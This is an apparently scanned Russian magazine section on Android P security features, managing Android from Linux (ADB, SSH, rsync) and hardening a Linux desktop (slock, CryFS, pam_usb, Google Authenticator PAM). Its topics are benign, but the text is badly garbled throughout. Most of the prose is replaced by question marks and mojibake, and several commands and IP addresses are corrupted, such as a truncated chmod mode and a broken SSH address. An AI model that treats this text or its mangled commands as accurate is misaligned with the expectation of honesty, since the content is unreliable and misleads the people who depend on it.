???????�?????
????????燯nixoid�燤obile
zobnin@glc.ru
???燗NDROID�????�???????
???????????��???????????
?????????????
????�???� ???�?� Google� ????�??�???� ????�???????�??
??????� Android� P,� ???????� ???�?� ??� ????�????�???� ?????�
????????� ????�?� ???�??� ???� ??� Android� 9.� ?� ?????� ???�??
?� ???�??�??� ???� ????�??�?� ?????????,� ?????�???� ?????
???�???� ??????� ???�??�????,� ???�??�??� HDR,� ????� ?????,
??� ????� ???�????,� ???� ????�?,� ????�???�?� ???�?� ?????�?
?????� ????�??�??:� ???????�????� ?� ?????� ???????�?� ?????�
????�??.
??????�?�??????�????????????�?????��????????
??� ?????� ??� ?????� ?????�??� security????�????� Android� ???�?� ?????�??
???�?�?????�?????燗ndroid燩,�?????��??��?.�??,�????�?�?,�??�??
??� ??????�??????� ??????,� ???�?????� ?� ?????� ???�????� ???�???�????,
???????�??????�?��??�?????營dle,�?�???�???�???��?????�?��???.�??
???� ???�???� ????� ???�???,� ???????� ?????� ???�???� ?� ???�???� ???�???�????
???�??,�?????�??�??�???�???�?.
??� ????� ????� ?????:� ???� ????� ?� ???�??,� ????�????�??�??� ???� ????�?
????�??�??� ????� ???�??�??� ???�???�??,� ???�???�???� ???�??�?� ???�???
?�???�???????�??�???�????,�??�?�??�???�??�?�???�???�??�??�????�
????.
???� ???�?� Google� ?� ???�??�??� ???� ????�???�?� ??????�?????� ???� ???????�
????爁oreground爏ervice.�??�??�????�??�??�??????�???�?,�??????�???�
??�??�??�????��?????�??�??�????,��?????�????�?�???�?????�?.�???�
??� ??� ????�?� ????� ??� ????�?????�?� ??????� ???� ???�??�????� ????�??�??�?
?????�??�?.
??????�?燙LEARTEXT燞TTP
???�??� ???�??� ?????�??????� Android� P� ?� ???�??� ???�??� ??� ??????�??????
HTTP� ???� TLS� (??� ????� ???� ???�??????)� ???� ????� ???�???�??,� ???�?????
???�????�??�??燗ndroid.�??�???�??�???,�???�� build.prop�??�???�??
???�??� targetSdkVersion�???�?�,�?�??�???�??�?�??�??�??�??�????�
??��??�??�?燞TTP.
???�???�???�??�??�?�????�??�?�???�?,�???�??�???�� ???�?�???�
???�?� ???????�????� ????� (network_security_config.xml)� ???�??� ????�
?????�??�??????:
<domain?config燾leartextTrafficPermitted="false">
牋�domain爄ncludeSubdomains="true">secure.example.com</domain>
</domain?config>
??????????�????????�????
??�?� ???� ???�???� ???� ??� ????�???�???,� ??� ?� ???�?????� ?????�??� Android� P
???�?�????�??�???�?????,�??�?????�?�????�????�??�??�?????�?????�
????�????�??�??�?�??�???�??,�???�???�??�?�?????�?????�燝oogle燚ri?
ve.�??��??�??�?�???�???,�??�???�燝oogle�?�????�??�???��??�?�???�
???.� Apple,� ????�?,� ????�?� ???�?� ???�??� ?� ?????�???� ????�?� ?� ????�???� ??
????�??�?�??�???�?�??�???.
???????�????????????��??????�?燤ITM
???�???�???�??�??�????�??????燗ndroid燩��??�?????�??�??�??�???�
?????�????� �??????�??粻 ??????� ???�??????�??� (Con?rmationDialog).� ??
???�???�?� ????�???????�?,� ???� ????�???????� ???�???�???�?� ???�??� ?????
?????�?��??�????�?��??,�???��??�??�??,�???�???�???�???�?????�?
???�???�??��??�???�?????�?�??�????�??�????��???�???�??.
??�?� ????�???????� ??????�???�?� ????�???� ??� ????�????� ?????�?,� ????�
????�??� ??????�?� ????�????�????�??� ???�???,� ???????�??� ?????� ??????�
??????�??� ????�????� ?� ???�????????� (HMAC).� ???�???� ???�???�?
???????�??� ???�??� ???????�??� (TEE),� ???????� ??????�?� ?????�????� ????
?� ?????� ????�?????�?.� ???�???� ????�???,� ???� ????�???????� ???�???�???�?
???�??�???�????��??�????�?��??.
??????�?�????????????�??????燗PI
?燗ndroid�???�??�???�??,�????�?????�???�??�??�???�???燗PI.�?�??
???�??�???�?� ?� ???� ?� ???�?????�??�???�?,� ???� ????????� ???�??� ?� ????� API
?�??????�??�?????.�??�?�??�???�?��??�??�??�????�???�??�???�??,
?� ???� ???�????� ?� ???�????�??� ?� ???�?????�??�??� ?� ??????� ???�???�??
(????�??燗PI�????�?????�?��???�???�?�??�??��??�??).
?燗ndroid燩�??�??��???�??燗PI�??�????.�????�???,�????�??�??燗n?
droid� ???????� ???�??�????� ?� ???� ???�??,� ????� ???�???�??� ??????�???� ????�
????????� ????�??�???� (deprecated)� API.� ???� ???�??� ???�?????� ???�?????�
?????�????�?�?�?????�??????�????燗PI.
?????????????????�?????燬TRONGBOX
??�???�??� ??� ??????�??,� ????�??�??� Android� P,� ?????� ?????� ?????�????
????�????�????�??�?????燬trongBox,�?????�???��????�????��??????
TEE�(Trusted燛xecution燛nvironment,�??�????,燭rustZone��??�??�????燪ual?
comm).� ??� ????,� ????� ??????� ?� ?????�????�??� ?� ??????� Keymaster� HAL
(Hardware� Abstraction� Layer),� ???????� ?� ???????� ???�???� ??� ????�???�???
?????�??�????�?,�????�????�??�??�???�???�??�?????�???�??�??�???.
???�??�???�??�?????�燢eymaster
??????????燨MAPI燗PI
Android� P� ???�????�???� GlobalPlatform� Open� Mobile� API� (OMAPI� API),� ?????�
?????�??�??� ???� ???�???� ?� ???????�??� ???�??�??� (Secure� Elements,� SE),
???�????�??� ???�??????,� ???????� ????�?� ????�??�???�???� ?� SIM????�?,
???�??�???� ???�?,� ???�?� ????�?� ???�???� ?� ????�??�?� ?� ???�??�???� ????�
??????�???�??�????.
Secure燛lement��?????�??�??�????�??�??��???�???�??�??????.�?
????�???� ??� ???????�??� ???�????� ?� ?????�????� ???�??�??� ???�???�??.
?�???�??�??��??�??�???燦FC燬ecureElement�???�?�??�?��??????�???
???�?,�?�??�?�????�???????�?燬IM????�?�??�???��??�?�?????.
????? ???????
? ??�????� ?� Android� P� ???�???�??� ????�?� ??� ???�??� ???�?????� ?????�??
?????� ??????�???� ?????� ???????�??� Build.SERIAL.� ???� ????�?� ?????
???�?� UNKNOWN.� ???� ??????�??� ?????�???� ??????� ??????� ???�?� ????�
???????燫EAD_PHONE_STATE.
? ??�??�???� ?????�??� ???�??�??� ???????�???�???????�???� ?????�???
???�?� ChaCha20,� ???????� ?� ???� ???�?� ??????�???�?� ?� ???�??�?� Chrome
???�????�????��??�???燝oogle,��???燣inux�??�?????�??�??�??�??
?????���?????�??�??�????�?????�???�??????.
? ???�???� SELinux� ??????� ???�???�?� ???�???�???� ??????�?� ???�???
?� ???�???� ???�???�????� ?????� ???�????�??� ?????�??� ????� ???�???
??�??�?.
? ?� ???�?????� ?????�??� Android� P� ???�???�???� ????�???� ???�??�??� ????�
??????�??� MAC?????�??� ???� ???�???�????� Wi?Fi??????.� ???� ???�????
??????�?��????�???�???�???�?????�??�(?爄OS�????�??�???�????�??
???��??�??�.
?????
ANDROID
???�????????
??????????
????????
?�?????�燣INUX
???????�?????
????????燯nixoid�燤obile
zobnin@glc.ru
Android� ?� ???�??�???�?� Linux� ??� ????�?� ????�???�??� ??� ?
???� ????�???� ??� ?????� ????� ?� ??� ???�??� ????�?� ?????
??????.�燗ndroid�?????�?�???�???�??�?????燣inux,�???
???�?� ????�?????� bash,� ??????� ?????�?� ?� ????� ?????�???
???�???.� ????�????� ??� ????�???� SSH,� ??� ??????� ??????
??�???��??�?��???�?????�?????爎sync�??�??�??�????�
???�??�??.�??�???�???�?��?????�??�????�?.
ADB
???�??� ?� ????????�???� ???�??�??�?� ????� ????�??????� ????�?????�??� An?
droid�燗DB.�?�??�??�?�??�?????��??,�???�?�????�???�?�??�???
???�?????�?.� ????,� ADB� ???�????�???�???� ???� Android� Debug� Bridge,� ?� ??
????� ???� ???�?� ???�?� ???�???� ???????�??� ????�??�??� ?� ???�?.� ADB� ????�
????�?�???�??�?????��????�???�???,�?????�???�??�?��?????�???��?
??????�???��????�???�??�??�??�??�?????.
???�?� ???�??�??� ADB� ?� Windows,� ????�???� ??� ????�??�?????� ????�???
?� ???????�?????� ??????,� ?� Linux� ??� ????�?� ??????�?.� ???�????�?� ????�????�
????燗DB�?�???�??�?�(???�???�?��??�??�????�????��??????�?燯SB)
?�???�?????�????��??�????燼db��??�???:
//燯buntu/Debian/Mint
$爏udo燼pt?get爄nstall燼db
//燗rch燣inux
$爏udo爌acman�S燼ndroid?tools燼ndroid?udev
??�??�???�?????�??�??�???�???�???��??�?��?????�???�???�????�?.
??�???�??�???�?�??�??�??�??�?????�??:
$燼db燿evices
??�????�?�?�??�??�??�??�?????�???燗PK:
$燼db爄nstall爁ile.apk
??�???�????�??�?�?�?????�???:
$燼db爌ush�???�/sdcard/
???�???�??�??�?��?????�???:
$燼db爌ull�/sdcard/DCIM/Camera/photo.jpg爌hoto.jpg
???�???�????�??��??�???�??�?�???:
$燼db爏hell爏creencap�/sdcard/screenshot.png
$燼db爌ull�/sdcard/screenshot.png
$燼db爏hell爎m�/sdcard/screenshot.png
??�????�???�?燩ower:
$燼db爏hell爄nput爇eyevent�
??� ?� ?????�?� ??,� ADB� ???�?� ??????�?????� ???� ??????�??� ???�???� ?� ??????�
????�???�?�???�??�?:
$燼db爏hell
???�?� ????�???,� ???� ADB� ?????� ????????� ??� ????�?� ??� USB,� ??� ?� ??� Wi?Fi,
????�?� ???� ???�?� ???�?� ???�?� root� ??� ??????�???� ?� ???�???�??� WiFi� ADB.
?????�???�??�???�??,�???�???�????�???????��??�????�???�?��????�
???�?��??????燼db燾onnect��??????�???�??�???�???營P?????�?:
$燼db燾onnect營P??????
WARNING
?� ??????�??� ???�??�???�??� ADB� ?????
??� ????????� ???� ????� root.� ???� ???�???�??� ?????
??????�???� ???�????�??� ???�??� Udev� ?� ???�???�
????�?.� ???�??�?� ????� ????�??�?????� ??
???�?????�??�????�(android?udev�燗rch燣in?
ux),�???�??�??�????燯dev�????�??????�?.
ADB-SYNC
ADB� ???�?� ??????�?????� ?� ???� ???�??�???�??� ???�??� ???�?� ??????�???�?
(???�??�?�???�???�????爏ync),�???�?�???�??�??�???�?????�?�????�??
adb?sync.�??�??�????�?�??�???��????�???.�??�????,�??�??�?�??�???�
????�?????�?????�?�?????�???��?�?:
$燼db?sync爚/Music/�/sdcard/Music
?�??�????�???�?�?�??�??�???�??,�?��??�???�?�??�??,�??????�???
???�???�?�?:
$燼db?sync�?delete爚/Music/�/sdcard/Music
????�??�??�??�??�???�??�?�?�???�(????????�??�??�???�??):
$燼db?sync�?reverse�/sdcard/Download/爚/Downloads
ADBFS
???� ????� ????�??�??� ???�??� ????????� ???�??� ?� ???�??� ??� ??????�???
?�??????燗DB��?????�?????� adbfs,�???�???,�??????�??�???�?�????�
????????�?????�???�??,�??�?�??�???�?�??�????�??�??�?????�???.
???�?�??�?�???�?????燼dbfs�燗rch燣inux.�????�??�???�燗UR,�????�?
???�????�?�????�???�???�????�?:
$爕aourt�S燼dbfs?rootless?git
?燯buntu��??�??�??�????燼dbfs�??�??�?�???????�???�??:
$爏udo燼pt?get爄nstall爈ibfuse?dev燼ndroid?tools?adb
$爂it燾lone爂it://github.com/spion/adbfs?rootless.git
$燾d燼dbfs?rootless�
$爉ake
??��???�?�??�?�??�??�???�??�????�??�???:
$爉kdir爚/Android
$燼dbfs爚/Android
???�????�????:
$爁usermount�u爚/Android
GO-MTPFS
???� ????� ????�??� ???�??�????� ??????�???� ???� ???�????� ???�???� ?� go?
mtpfs,� ???�????� ???�???,� ???�???�???� ??????�???� ???�??� ??� ???�???�?
MTP.�???�?�???�??�????�?????�???�?��???�??�??�??�??�?�?????.
?燗rch燣inux�???�?????爂o?mtpfs�????�???�?:
$爕aourt�S爂o?mtpfs
?�??�??�??�??�???�??�??�???�?�???�??:
$爏udo燼pt?get爄nstall爂olang?go爈ibusb1?devel
$爉kdir�/tmp/go
$爀xport燝OPATH=/tmp/go
$爂o爂et爂ithub.com/hanwen/go?mtpfs
$爂o爄nstall爂ithub.com/hanwen/go?mtpfs
????�?�??�??�?�??�??�????,�??�燼dbfs:
$爉kdir爚/Android
$爂o?mtpfs爚/Android
???�????�????:
$爁usermount�u爚/Android
SSH
????�?????�?????燗DB�??�???�??��?????�????�????�???????�?�?????�
???,� ????� ???�?????,� ???� ???� Android� ?????�??�?� ???�?� ???�???�?� ???�?????
SSH????�????,� ??� ???�?????� ???�?� root.� ???� ???� ?� ????,� ??� ???�??� ???�???
SSH�????�???�??��???????�??.��????�??�????�????�??�???�??????
???�???� SimpleSSHD,� ????�??� ???�???�??� ????�??� ???� ???�????�???� ????�
?????� SSH????�???� DropBear� ???� ?????�??????� ???�??.� ????� ?� ????� ????
root,�?�??????�??�??�?�???�?????� BusyBox燨n燫ails,�????�??�??�?????�
????�???�?,�????�??�???�??��??�??�???�??燣inux.
??�???�?????� SimpleSSHD� ?????� ????�?.� ?????�????,� ??????�??� START
?�??�??�????�?��??�??�???營P?????�?�(????�22):
$爏sh�2.168.31.236�p�22
?� ??????� ???�??�????� ??� ????�?� ??????�?� ????�???�??� ??????,� ???????
???�???� ???�???� ?� ???�???.� ???� ??� ?????� ????�??� ???�??� ?????�?????�??,
??� ??� ??????� ???�??�??� ?????�?????�??� ??� ???�??.� ????�?� ????�??�??
????� ?????�??� ????� (~/.ssh/id_rsa.pub)� ?� authorized_keys� ?� ??????
?�??????爏sh�?�??�?�?????�???�??�?.
SimpleSSHD
BASH,燭MUX,燤C
SSH????�??� ??� ????�??�?� ???� ??� ????� ?????�???� ???????� ???�?????�?,
??�??�???�?�??�?�??�???,�???�???�?????�?�???�???�???�????�??
???�??�??�?,� ?????� ???� bash,� tmux� ?� mc.� ???�?????� ???�????� ?� ???� ???�?
?�????�???�?????�?�??�?�?????��???�???�?��??�??�???�??????�?.
?� ???,� ???� ????�?????� ??� ????�???� bash,� tmux,� mc� ?� nano,� ?� ???� ???�???�
?????��?????�??�??�??�?�???�???�??�?,�?�??�???�???�??�?????�?.
?�??�?�??�??�???,�??�???�??�???�???�??�?爎oot�?�???�??�?.
????,� ???�???�?� Terminal� IDE,� ????�??�???�???� ?????� APK� ?� ZIP,� ????�
??????�???,�??????�???� assets/system?2.0.tar.gz.mp3,�???�??�????�
????,� ???�??� ???�??????� mp3,� ?� ???�?????�???.� ????�?� ?????� ???�??�??
??????�??��??�??,�?�??????�??�???�???�?�???�?爏ystem/bin�爏ystem/
etc/terminfo.�??�??�????�??�??�??�??�??�????�??�????�?,�??�???
???�????�?,��?????�??�??????.�??�??�???�????�??�??�??�??�?�??�???�
???�???�??�??�??.
???�?????� ???�???� ?� ???????� terminfo� ?????� ??� ???�?� ??????� ????�??�?.
?????� ???�??�???� ?� ????� ??� SSH� ?� ???�?� ???�?????� ?????�?,� ???�?
????????�??�???????�?????�????�??�????�?�?????�?:
$爏u
#爉ount�o爎emount,rw�/system
??�??�??�????�??�??�??�??�???�� /system/xbin/��???�???�?�??�??
???????�??�(??�??�???燽ash):
#燾p燽ash�/system/xbin/
#燾hmod�5�/system/xbin/bash
??�??�??�??�???� /sdcard/ssh/.bashrc,�????�?��???�??�?????�????�
??:
export燭ERMINFO=/sdcard/terminfo
export燭MPDIR=/data/local/tmp
export燩S1="\u@\h:\w燶$�"
??�???� ???�???�?� SimpleSSHD� ??� ????�??�?� ?� ?� ?????� Login� Shell� ???�?� /
system/xbin/bash,�???�???��????�????�?�??�??.�??�??�?????�??�?
??燬SH�????�???燽ash��????�??�????�??�???�??�??�????�??�???.
???�?� ??????�?� ???�??�???� ??????� Vim� ?� mc,� ???�????� ??� ???�?� ??????
???�?� ??????�?� etc/mc� ?� etc/vim,� ?� ?� ????� /sdcard/ssh/.bashrc� ??????
????�?:
export燤C_DATADIR=/sdcard/mc
export燰IMRUNTIME=/sdcard/vim
Midnight燾ommander,�??????�??�燗ndroid
RSYNC
SSH????�??� ????� ???� ???�???????� ??????�?????� rsync,� ???�??� ???�???
???�??�??�???�??��?????�??�??.燫sync�??�???�?�??�???�????�??�???
???�??�?????�??� ???�??�???�??� ???�??� ???�?� ???�?� ??????�?� (???
???????� ?� ????�??�??,� ???� ?� ?????� ???�??)� ?� ??????�???�?� ????�?� ?????
?� ????�??�??� ???�??� ?� ???�????????� ?????�????�??� ????�?????� ???�???�
????�??.
????�??�??�??�??�?????�??????爎sync��???�?�?�???�??�??:
$爎sync�?update�?progress�e�'ssh�p�22'�azv�2.168.31.236:/
sdcard/DCIM/Camera爚/Photos
???� ?????�?� ???�???�?� ???� ?????�????� ??� ????�??�?� ?� ???????� ~/Photos,
???�??�??� ??,� ???� ???� ????� ?� ??????�?.� ????�?� ?????� ?azv� ?� ???�??� ???�??
????�???,�??�??????�???�?????�???????�??�???�?�??�?�??�??�??????�
????��??�???�??�???�(????�a)�???�?????�?????�??�??�(????�z).
??�?????�????�?��?????�????�??�??��?????�?�???�???:
$爎sync�?delete�?progress�e�'ssh�p�22'�azv爚/Books�2.168.31.
236:/sdcard/Books
?????�?�?????�?????�???� ??delete,�??�?�??�???�??�?,�??????�???
???�???�?�?????�???�?????�?爚/Books.
??� ????�????� ???� ????�?� ?????�????� rsync� ?????� ???�???� ???�????
???????�??�??�?.�??�?�??�?�???�???,�??�?�?????�?????�???� ??par?
tial,� ???????� ???�????� rsync� ???�?????� ??????�??�??� ???�?� ?� ?????�?????
??�??�????�??�??�?????�????�?�????�?.
SSHBUTTON
??,� ?� ????�??�?� ??� ???�??�?????,� ???�?� ???�??�???�???�?,� ??� ???,� ????
???�??�?�???????燬SH????�??�????�?�???�??�?��??�??��???�??�??
?????�??� ?????� ??� ?????�??� SSH????�????� ???� Android� (???� ??� ConnectBot,
???�????),�???,�????�?,�?�????�??�???�????�?�?�??�?????�??�?????�
??�?????�???�???�?.
??�?�?�????,�???�????��??�???�??燬SH燽utton,�??�???�???�?????�
????�??�??�????�?�?�??�??�?????�?�??????�???�?.�????????�燬SH
button�????�??,�?�??�???�??�??????�?????�?.�???�?�????�?燬SH燽ut?
ton,�????�???�燗dd...��??�?�??�??�????�?,�????燬SH????�???,�????
?�?????.
SSH� button� ????�?� ??????�?????� ???� ???�??????� ???� ????�????� ???�?
(?????�?� systemctl� suspend� ?� halt),� ?????�?� ?� ????�??�?� ???�?????,� ????�
???�???�????� ??????� (???�????,� ???�?� mocp,� ?� ???????� ?� ???�??�????
?� ?????� ??� ????�??� ???�??,� ???�???�?� ?????????� ?????� ?????� ?????�???
????�?).
SSH燽utton
??????
??�???�?????� Android� ?� ????�?� ?� Linux� ???�???�???�?� ????�?.� ?� ????�??
??燱indows�????�?�??�?�????�?????�??�???�???,�??�????�??�??�???
?� ???�??� ?????�??� ????.� ?� ????�???�??� ???�???� ???�?� ????�???� ????�???�
???�?�??�???燣inux燬SH�爎sync,�?��???�???�?�??�?�??�?�????�????�
???�??�??�??�??�?.
?????
????????
???????
?燣INUX
??????????,
??????????????
??�?????��??????
???????????
???�??,�??�??�?????�?燷[�??�??�?�????�
??????� ??� ???�?????�??� ???�??� ?� ???????�
????� ????�??� ???� ????????� ???�??�???
???�?????,�??�?��??�?�?????�???.�??
????�??�?� ?� ???�?� ?� ????� ??????�??.
??� ???,� ???� ????� ??????�??� ???�???,� ????
?� ????� ??� ????????,� ??????� ???� ????� ?????�
?????�??.� ???� ???� ????� ??� ??????�?� ????�
???,�??�???�?�?�??�????�??�???��????�
?????????� ????�??�??� ???�????� ???�???�?
?????�???�?.
???????�?????
????????燯nixoid�燤obile
zobnin@glc.ru
??????????�?????
???�??,� ???� ????�?,� ?� ????,� ?� ????�?� ?� ??????� ??� ????.� ????????� ??,� ?????
???�???�?:�????�??�????�??�??�?�??�?�????�????�??�????�??�????�
??,�??????�??�???�???�?�?????�??�?�??�???�??�????�???�??�?????.
??� ???� ??????,� ????� ??� ??� ??????�????� ???�????�??� ???�?� ?� ????� ?????� ?
???�????�??�???�??�????�??�??�?燜luxbox�??爄3?
??�??�??�?� ???�?� ?????� ???�???�?????� ???�????�????� ????�?,� ??� ?� ??
???????�????� ????�?????�?� ??� slock.� ???� ????�?� ????�??� ???�????�??,
??� ???�???� ???????� ???�????�??� ???�??�??� ???????�??,� ????� ???�?
?�????�?????�??�??�??.�??,�??�?�???�?,��??�?????�?�????�??�??
???�??.�??�??�?�?????�????�??�????�?�????,��??�??????燛nter��???�
???� ???�?????�???� ??????� ?� ????�??.� ???�??� ?????,� ????�???�??� �?????�
?????粻???�??��??�??��????,�??�???�???�?�????.
??�??�???� slock� ???�?� ???� ???�????� (???�?� ?????� ???�?????�???� ???�?),
???� ?� ????�???�??�?� ???�?� ???�??�????� ????�???.� ??� ???�??� ???�??� ????
??????�??�?爏ystemd?????�??�????�?�????�????:
[Unit]
Description=Lock燲爏ession爑sing爏lock爁or爑ser�%i
Before=sleep.target
[Service]
User=%i
Environment=DISPLAY=:0
ExecStartPre=/usr/bin/xset燿pms爁orce爏uspend
ExecStart=/usr/bin/slock
[Install]
WantedBy=sleep.target
???�???� ???� ?� ????� /etc/systemd/system/slock@.service� ?� ????�????
????�(USER��???�??��??�???):
$爏udo爏ystemctl爀nable爏lock@USER.service
???�???�???�?�???�??,�?�???�?�?�????�??�??�??????�????��???�
????�?????�?燘IOS��????�?�??�????��????�?????�??,�??�?�??�??�?
???�?.�??�??�????�???�?�??,�??�?????�???�??�?????�?��???�?,�??�?
???�?????�???�???�?�??�??�??�???�????�??�???.
???�??�???�???�??�?�??�???�?�???�?????�?????�?�??�????,�???????�
?????��??�??��??�??�?�??�?.�??�?????�?????�?�?�???�?燗TA????�????�
????,� ??� ???�??,� ????� ??????� ????????� ???�??� ???�?????� ????� ???�???�???,
??�????�??�??????�??�??�??????�???�????�????�??�??�?�??�?.
??????????�????
???�?� ???� ???????�??� ???�??�???�?� ???�???�?� ?????�?????� ???�???� ????
??�??�?�???�??�?�??�???�????�??�???.�????�??�??????�???�?�?????�
?????�??�??��??�?�??�?�????�?????�??????�(???�??�????�?�???�??
??????),� ??� ???�?� ????� ?????�???�??� ?????�????:� ???????� ???�???�??????�
???�?� ???�????� ???�????????,� ???????� ?????� ???�?????� ?????� ?� ?????� ????�
???�??.
??�???�???�???� ???�???�??� ???�???�?????�??�?� ???�?,� ????� ??????�
??????� ????�?� ???�??� /home� (??� ???????� ?� ???????�?� ????� ???�??),� ?� ????
???�???� ????�???� ???????�????�??.� ??� ???�?� ???�??� ???�??�???�?� ?????�
????�?� ?????� ????�??� ??� ????�????,� ??� ??� ????� ??� ???�???:� ????�??� ?????
?????�????�?????�??�????�?�???�?�??�???�????�??�????�???�?�???
????�?,� ?� ????� ??� ??????�??�?� ???�????�??� ??� ???� ????�?� ???�?� ???????�
???�???�?�??????�??��?????�?��????�???�???�????�????.
??� ?� ??� ????� ????�???� ????� ?????.� ???�???� EncFS� ?� CryFS� ??????�???
????????� FUSE,� ???�?� ???�???� ?????�????�??� ???�????�??� ??� ??????
????????.� ?� ??� ???????� ??� ??????� ?????�?????� ?????� ??????�?� ???�??
???????,�??�???�??????�?�???????�??�????�??�??�??�??�??????�????�
?????�???� ???�???� ?� ?� ???�????????� ???�??�???�??� ??????�?� ?� Dropbox
?�??�???�????�???�??�?????.
???� ???�????� ???�???� ??????�???� ????�???� AES?256� ?� ??????� GCM,
??� ????�???�?� ?� ?????�????.� EncFS� ???�???� ???�??� ????� ??� ??????�??�?
?�????�?�???�???�???�????�????�??�??��?�??�????,�?�????�?�???�
????�??�?� ??????�??� ???????�??� ?� ?????�???� ??????�??� ?� ???�???� ???�??.
???�???�??�???:�???�??????�??�???�???�???????,�??�?�??�???�????
???�??�?�??�?,�??�??�??�?�??�??�?,��?�??�??�??�??�???.
CryFS� ??????�?� ??� ?????�??� ???�??.� ?????�????�??� ?� ??� ???????
???????� ???�????� ???� ????�??� ???�????� ??????� ?� ?????� ??????�??� ?� ???�??
???�???�???�??�???.�???�?燙ryFS�????�?�?�??�????�???�?????�???�?
????�?,�??????�??�??�???�??��???�????燛ncFS.�???�???�??�???�???�
????�?� ?� ??????�??� EncFS,� ????� ??� ??� ??� ??????� ??� ????,� ??� ???�???� ?
??????� ?????�???�?� VeraCrypt� ???� ???�??� �???�????�??粻 ???�??�??�??
???�??????,�?????�?????�??�??�??�??????�????�???�??�???,�??????
????�?� ????????� ?� Dropbox� ???� ???�??�???�??� ????� ?????�????�??� ???�??
???�????�??�???�????.
??�???�?????燛ncFS�燙ryFS�???�?�???�?.�??�????�?�???�?????�????,
?�????�????�???�??�????�??�?????�??:
$燾ryfs爚/Dropbox/box爚/crypto
?� ???�??� ???�??� ??� ???�??�???� ?????�????�??� ???????� ~/Dropbox/box
???� ~/crypto.� ???� ???�?,� ???????�??� ?� ???�?????,� ??????�?� ?� ???�??
?�????�????�??�???.
?�???�??????�??�?�??�???�??�??�??�??�??:�??�?�??�????,�??�?
GPG,�??????�?????�?�???�???????�??,�???�??????��??�????.�??�???�
????� ???� ???�??�?� ????�??� ???�?� ???�??� ???�????,� ?� ???�?� ??????�??????
???�?�??�?�????�???:
$爁usermount�u爚/crypto
??�??�????�?????�?,�????�????�???��??????燙ryFS
??????????????�??�?????
????,� ????� ???????,� ??????� ????�??�??,� ??� ????�?� ??� ????� ????�?� ??????
???�??�????,�??????��??�????�??�???�????�??�???�??�?�??�?��??�?,
???�????,�???�?�?????�??�??�?????�?�??�??�??�??�????�???,�?�???�
????� ???� ???�??� ???� ???� ???�??�????�?� ????�?� ??� ???�?� ????�??�?.� ???
?????� ??????� ?????� ???�???�???� ????� ??????� ?� ??????�?.� ?????� ???�??
?????,��??�??�?�??�??????�??????.
????�?
??�??,� ???� ???�???� ???� ???�?� ???� ???�???�?� YubiKey.� ???� USB?????,� ????�
????�???��???�??�???�??�???�??�????�?????�??�?�??�??���??�???.
???�?�????�???��??�????,�?�?�????�???�???�?�???�??�?�??????�
??????�???�??�???�?.
??�???� pam_usb�??�???�?�??�??�??�????�?????�??��??????�????
USB?????�?.� ????�??� ??????� ?????� ???�?????:� ???�???� ??????�???
??�???�?�????�??�??�??�??�??,�??????�??�???�?��???�??�???�???
???�?.�?�??�?�????�?????�??爌am_usb�??�???�?�???�??�??��???�?,
????�??� ??� ?� ???�????�???� ?� ???�?� ?� ???�??� ????� ?� ???�???,� ????� ???� ????�
????�?.
???�?�??�??�?????�???,�???�?????�????�???�??�?????�???.�????�
??????爌am_usb:
$爂it燾lone爃ttps://github.com/aluzzardi/pam_usb.git
$燾d爌am_usb
$爉ake
$爏udo爉ake爄nstall
?燗rch燣inux爌am_usb�??�????�燗UR:
$爕aourt�S爌am_usb
??�?????� ??� ?????� ???�??�??� ???�??� ??� ????�?� (?????� AuthKey� ?� ????�
??????�??�??):
$爏udo爌amusb?conf�?add?device燗uthKey
???�???�???�?????�?,�??????�????�??�?????�????�?????�??��??????
????�?:
$爏udo爌amusb?conf�?add?user爑sername
???�?????,�??�??�??�??�??�??,�??�???:
$爏udo爌amusb?check爑sername
??�????,� ????????� pam_usb� ?� ???�??� PAM????????.� ???� ???�?� ?????�???
????� /etc/pam.d/common?auth� (???� /etc/pam.d/system?auth� ?� Arch� Linux
?燜edora)��????�???��?????�??�?�????�???�?:
auth爏ufficient爌am_usb.so
?� ????� ???�??� ????�?� ?????� ???�????�?� ???� ?????�?????�??.� ????� ??� ??
??????�???????�???�?????�??�????�?????�??,�??�?�??�???�?��???�?,
?�?????,�???�?�????�?�?�????:
auth爎equired爌am_usb.so
????��???,�??�????爌am_usb�?�?????�??�???�???�??�????�?�??�???�
??,� ????� ???�?� ????????� ??????� ????????�???�??� ???�?� ?� ??� ???� ?????
?????�???�????�?�?????�?�???.��???�?�??�?�????�???,�???????�??
??�??�??�???�?��?????�?????�?�??�????�?????�??.
???�??�????爌am_usb
????�???
????�?�???�?�(???��????�????��??)�??�?�????�???�???.�??�??,�??
????� ??� ???� ?� ???�?� ??� ????�????�?� ???�???�???� Google� Authenticator.� ???
?????�???� ????�???� TOTP� (Time?based� One?Time� Password,� RFC� 6238),� ????�
????�???�????�???�????�?????�??��????�??�???�??��??????�????�
????�???� ??????,� ???�???�????�???� ???�??� ???�???�???� (?� ???,� ???� ???
??????�?,�?????�?????�?�????).
Google� ???�???�?� ????�???????� Authenticator� ?� ???� ???�?� ???� ??????�
??????�??� ?� ???�?� ???�????.� ????�?� ?� ?????�??�?� ???� ?????� ??� ??????�?
??燝oogle��?�?????�???�??�??�???�(??????�?�??�?,�??�???�??�??????�
???�???�???�??�??????,�??�???�??�??�????,��??????燪R?????,�??�?
????�??�???�??�??�???�?�?????�???),�??�??�???�?�??�???�?????�?�?
???�????�?????�??��??�???�??�???�?�??�??�??????.
???�??�?�???�?????�???�?????燩AM???????爌am?google?authenticator:
$�./bootstrap.sh
$�./configure
$爉ake
$爏udo爉ake爄nstall
?燗rch燣inux�???�??�?�???�???�??:
$爕aourt�S爂oogle?authenticator?libpam?git
??�??�????�???�??�???�??爂oogle?authenticator:
$爂oogle?authenticator
???�??�???�???燪R????�(???�??????�???�?�?�???),�??????�???�?????
?????�???�???� ?� ???????� ???�???�??� Google� Authenticator� ??� ????�??�?,
?�??�?�?????�??�???�?�??�????.�?�??�??�???,�??�?�??�????�?�(????�
????�??� ???�??�???� ???�????�??� ???�?� ???�????� ?� ???�????),� ????�??
????�?????�?.
??�??,� ???� ?� ?� ???�??� ?� ????�??,� ?????�???� ?� /etc/pam.d/common?auth
???�?????�???�?:
auth爎equired爌am_google_authenticator.so爊o_increment_hotp
??�?????�??�?????�??�?�??�???�??�??�?????�???��???�?????????
????�???� ????�?� ?� ???�??� ????�????.� ???� ???�?� ????�?� ???�???� ???�??
?????��??�??�??�????.
QR????爌am?google?authenticator
?????????????
?�??????�??????,�???�???�??�????��??�??????�?�????�???????
????� ???????�??� ??� ????�???.� ???�?� ????????� ???� ????�??,� ???�?� ???�??
???�??� ?????�??,� ?� ????�?� ?????� ???�???� ?????�???�??,� ?????�??� ???�???
